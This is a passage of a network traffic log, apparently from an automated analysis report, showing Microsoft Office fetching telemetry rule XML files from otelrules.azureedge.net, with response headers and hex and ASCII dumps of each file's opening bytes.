                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:37 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 2592
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8db94728-c01e-0034-79d1-452af6000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010037Z-1746fd949bdkw94lhC1EWRxuz400000000kg00000000bnnv
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:37 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    81192.168.2.64978713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:37 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:37 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 3342
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: b8dd1d48-d01e-005a-01dc-437fd9000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010037Z-174f7845968ljs8phC1EWRe6en00000016m0000000008901
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:38 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    82192.168.2.64978913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:38 UTC191OUTGET /rules/rule90401v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:38 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1250
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDE4487AA"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: baa0a071-001e-0082-5b91-3f5880000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010038Z-174f7845968j6t2phC1EWRcfe800000016t000000000myr1
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:39 UTC1250INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    83192.168.2.64978813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:38 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:38 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 2284
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: a7f5da2f-b01e-0070-7a69-431cc0000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010038Z-174f784596886s2bhC1EWR743w00000016s000000000bk5w
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:39 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    84192.168.2.64979013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:38 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:39 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1393
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 5bdbb5de-801e-0067-47cb-45fe30000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010039Z-174f78459685m244hC1EWRgp2c00000016k000000000azns
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:39 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    85192.168.2.64979113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:39 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:39 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1356
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 55cb7248-101e-0017-4fd4-4547c7000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010039Z-1746fd949bdjzh7thC1EWR3g6400000000dg0000000015vw
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:39 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    86192.168.2.64979213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:39 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:40 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1393
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: ddb132fa-c01e-008d-18cc-452eec000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010040Z-1746fd949bddgsvjhC1EWRum2c00000000p000000000nczu
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:40 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    87192.168.2.64979313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:40 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:41 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1356
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 5ce939f7-901e-00ac-7ec7-45b69e000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010041Z-174f78459684bddphC1EWRbht400000016k000000000006f
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:41 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    88192.168.2.64979413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:40 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:41 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1395
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4ebcc1fc-101e-0028-09cb-458f64000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010041Z-1746fd949bdwt8wrhC1EWRu6rg00000000q0000000006ebz
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
